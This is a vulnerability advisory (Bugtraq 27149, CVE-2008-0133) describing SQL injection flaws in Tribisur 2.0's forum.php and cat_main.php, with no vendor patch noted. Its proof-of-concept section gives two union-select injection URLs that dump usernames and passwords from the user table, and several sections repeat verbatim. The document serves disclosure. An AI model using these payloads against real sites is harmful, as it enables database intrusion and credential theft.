Tribisur 'forum.php' and 'cat_main.php' Multiple SQL Injection Vulnerabilities
BID:27149
Info
Tribisur 'forum.php' and 'cat_main.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27149 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0133 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 05 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | x0kster is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Thomas PEREZ Tribisur 2.0 |
| Not Vulnerable: | |
Discussion
Tribisur 'forum.php' and 'cat_main.php' Multiple SQL Injection Vulnerabilities
Tribisur is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Tribisur 2.0; other versions may also be affected.
Tribisur is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Tribisur 2.0; other versions may also be affected.
Exploit / POC
Tribisur 'forum.php' and 'cat_main.php' Multiple SQL Injection Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/forum.php?action=liste&cat=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0,0,0+from+utiliz+where+id=1 http://www.example.com/cat_main.php?id=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0+from+utiliz+where+id=1
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/forum.php?action=liste&cat=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0,0,0+from+utiliz+where+id=1 http://www.example.com/cat_main.php?id=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0+from+utiliz+where+id=1
Solution / Fix
Tribisur 'forum.php' and 'cat_main.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Tribisur 'forum.php' and 'cat_main.php' Multiple SQL Injection Vulnerabilities
References:
References:
- Tribisur Homepage (Thomas PEREZ)